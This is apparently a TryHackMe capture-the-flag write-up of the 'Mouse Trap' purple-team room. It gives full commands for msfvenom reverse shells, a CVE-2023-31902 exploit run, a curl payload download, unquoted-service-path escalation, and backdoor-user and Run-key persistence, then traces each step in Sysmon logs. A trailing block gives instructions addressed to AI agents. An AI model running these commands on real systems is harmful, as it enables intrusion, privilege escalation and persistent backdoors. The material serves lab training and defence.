Success!

# Mouse Trap {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Jom and Terry Go Purple Follow the adventures of Jom and Terry, members of the TryMouseMe purple team, as they work through a thrilling exercise of Attack and Defense. From initial access to persistence, you will emulate a three-stage attack on a Windows environment. ### Recon We start with a Nmap scan of `mousetrap.thm`, this revealed several open ports on a Windows system. The host is running Microsoft services such as RPC (port 135), NetBIOS-SSN (port 139), and SMB (port 445). Remote Desktop Protocol (RDP) is available on port 3389. WinRM is accessible via Microsoft HTTPAPI on port 5985. Port 9099 seems to be unknown.

With a default script and service scan, we see that port 9099 is identified as a Mobile Mouse Server. ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/mouse trap] └─$ nmap -sT -sC -sV -p 135,139,445,3389,5985,7680,9099,9999,35913,47001,49664-49673 -Pn mousetrap.thm Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-15 14:08 EST Nmap scan report for mousetrap.thm (10.10.58.135) Host is up (0.038s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: MOUSETRAP | NetBIOS_Domain_Name: MOUSETRAP | NetBIOS_Computer_Name: MOUSETRAP | DNS_Domain_Name: MOUSETRAP | DNS_Computer_Name: MOUSETRAP | Product_Version: 10.0.17763 |_ System_Time: 2024-11-15T19:10:02+00:00 | ssl-cert: Subject: commonName=MOUSETRAP | Not valid before: 2024-07-03T16:07:31 |_Not valid after: 2025-01-02T16:07:31 |_ssl-date: 2024-11-15T19:10:45+00:00; -1m11s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 7680/tcp open pando-pub? 9099/tcp open unknown | fingerprint-strings: | FourOhFourRequest, GetRequest: | HTTP/1.0 200 OK | Server: Mobile Mouse Server | Content-Type: text/html | Content-Length: 326 |_ Success!

The server running on "MOUSETRAP" was able to receive your request.

9999/tcp open abyss? 35913/tcp open unknown 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp closed unknown 49671/tcp open msrpc Microsoft Windows RPC 49672/tcp closed unknown 49673/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9099-TCP:V=7.94SVN%I=7%D=11/15%Time=67379C49%P=x86_64-pc-linux-gnu% SF:r(GetRequest,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\ SF:x20326\r\n\r\nSuccess!

The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20 SF:to\x20receive\x20your\x20request\.

\r\n")%r(FourOhFour SF:Request,1A7,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x SF:20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x2032 SF:6\r\n\r\nSuccess!

SF:The\x20server\x20running\x20on\x20\"MOUSETRAP\"\x20was\x20able\x20to\x2 SF:0receive\x20your\x20request\.

\r\n"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-11-15T19:10:05 |_ start_date: N/A |_clock-skew: mean: -1m11s, deviation: 0s, median: -1m11s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 211.88 seconds ``` By visiting the index page, we see the info that the server is running on `MOUSETRAP`.

With a little research, we can find the following exploit of `CVE-2023-31902`: {% embed url="" %} > The exploit has two versions, one that uses SMB and one that uses HTTP. It allows an attacker to execute arbitrary code on the target machine by sending a specially crafted request to the Mobile Mouse server ### Remote code execution The room asks us to do the following to gain remote code execution: > * Once you’ve found the CVE and exploit, use the version that uses SMB, not HTTP > * Generate a Windows stageless reverse TCP (x64) shell > * Ensure that your reverse shell is called `shell.exe` We found an exploit targeting both SMB and HTTP, now we need to generate a reverse shell called `shell.exe`. We generate the `shell.exe` using `msfvenom`. {% code overflow="wrap" %} ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4445 -f exe > shell.exe ``` {% endcode %} After we generated the shell, we set up a listener on `4445` and run the exploit: {% code overflow="wrap" %} ``` python CVE-2023-31902-v2.py --target mousetrap.thm --file shell.exe --lhost 10.14.90.235 ``` {% endcode %}

We get a connection back and we are `purpletom`.

In the users' directory of purpletom, we find the user flag.

### Unquoted Service Path The room now challenges us to abuse an unquoted service path to escalate privileges: > * Use `SharpUp.exe` for enumeration, located in C:\Users\purpletom > * Target the `Mobile Mouse` directory while executing the unquoted service path abuse An **Unquoted Service Path vulnerability** occurs in Windows systems when a service's executable path contains spaces but is not enclosed in quotes. This misconfiguration can allow us to execute a malicious file placed in a higher-priority directory along the path, potentially escalating privileges. We use `SharpUp.exe` as adivsed to find the vulnerability. The service runs`HelperService.exe` in an unquoted path in `Mouse Uilities`. So placing a `Mouse.exe` in `Mobile Mouse`folder should then execute `Mouse.exe` on runnning the service.

Next, we create a suitable executable that will run when placed in the unquoted path and the service is run. {% code overflow="wrap" %} ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.90.235 LPORT=4446 -f exe > mouse.exe ``` {% endcode %}

As a user, we are allowed to write to `C:\Program Files (x86)\Mobile Mouse`.

Next, we set up a python web server on our machine and use the PowerShell curl alias to download our crafted shell. We place it into `C:\Program Files (x86)\Mobile Mouse`. ``` curl http://10.14.90.235/mouse.exe -o mouse.exe ```

We list the available services via the following command: ``` wmic service list brief ```

There is the mobile mouse service:

Next, we set up a listener on port `4446`. Via `net start "Mobile Mouse Service"` we run the service.

We get a connection back. We are `NT Authority System`. On the Desktop of the Administrator user, we find the `root` flag.

Furthermore, we are able to spot some credentials for the `admin` user.

### Registry run keys and local account creation Next thing to do is to apply persistence by adding the key `shell` to `Windows\CurrentVersion\Run` with the value `C:\Windows\Temp\shell.exe` and adding a user `terry`. > * Use the `HKEY_CURRENT_USER` registry hive > * Use the `SYSTEM user` when creating the run key persistence > * Specify the registry key name (`shell`) > * Use the following path for the payload (`C:\Windows\Temp\shell.exe`) > * Specify the name of the backdoor user (`terry`) After using the following two commands we can run the `checker.exe` at `C:\Users\Administrator\Desktop` to reveal the final flag.. {% code overflow="wrap" %} ``` net user terry 12asdf$123 /add reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f ``` {% endcode %}

{% hint style="info" %} The procedure is so stringent that the subsequent analysis can be understood in the same way. In the origin of the room, these were not two machines. To keep it fair and to have the same environment, we now have two machines for each part. {% endhint %} ## Time to Catch Terry Now we switch to the blue side and try to understand what happened using the Sysmon Event Logs with `Sysmonview.` We follow the steps shown in the room to export the Sysmon logs as XML and import them afterwards in `Sysmonview.` ### What is the name of the payload that was shared? The first question asks us the name of the payload that was shared. On the first page, we have a list of DLLs and executables. By clicking on each of them, we can determine the image path. The executable `payload.exe` looks a bit suspicious. After clicking on it, we can see that the image path is indeed a shared folder.

### What is the IP attacker’s IP address? We have identified that suspicious executable. The IP is already present in the image path. For the following questions, we will follow the steps below: Clicking on the image path displays a session. By clicking on it, we can see an event graph. Each event can be inspected.

Clicking on Process Create reveals the same info for the second question.

### What is the full command-line of the executed payload? As we have already shown above, we inspect the `Process Create` event. Here we see the command line issued.

### What is the full command-line of the tool used to enumerate the privilege escalation vectors? Besides the event graphs, we can also use the View All Events tab. Since we know from the previous red part, we had to use `SharpUp.exe`, and find the full command line for the tool here.

### When was this tool executed? At the same entry, we are able to locate the time executed. {% hint style="info" %} This might be wrong {% endhint %}

The actual time of execution was a bit earlier:

### What command was used to transfer the reverse shell binary into the system? Since we already know the IP of the attacker, we can search for this in All Events View. There we will find the command used to transfer the reverse shell.

### What is the full command line value of the process created during the unquoted service path abuse? As we know from the attack, we are looking for something like `Mouse.exe`. We use the All Events View again, drag and drop the column GUID into the field (2) and search for Mouse.exe. We have now several sessions available. Of interest are those around the time of the attack (8/6/2024 4:20). We find some session pointing to cmd.exe. By clicking on the following below (4) + (5) we see an Event graph. By clicking on the Process Create event, we see the parent command line having the path for the HelperService.exe.

### What was the password set for the user created by the attacker for persistence The next question asks us about the password set for the user created by an attacker. We could go through all the sessions around the time of the attack to find the password, but we could also go back to the Process View tab. Here we look for net.exe, which can be used to add new users. Here we find a session where a user was created around the time of the attack.

### What is the key name used for persistence? As with the user, we could now go through all sessions in the View All Event tab at the time of the attack. However, we can also explicitly search for `reg.exe` in the Process View tab. There we will find a session revealing us the key and the target path used by the attacker.

### What is the target path of the persistence implant by the attacker? As with the user, we could now go through all sessions in the View All Event tab at the time of the attack. However, we can also explicitly search for `reg.exe` in the Process View tab. There we will find a session revealing us the key and the target path used by the attacker.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2024/mouse-trap.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.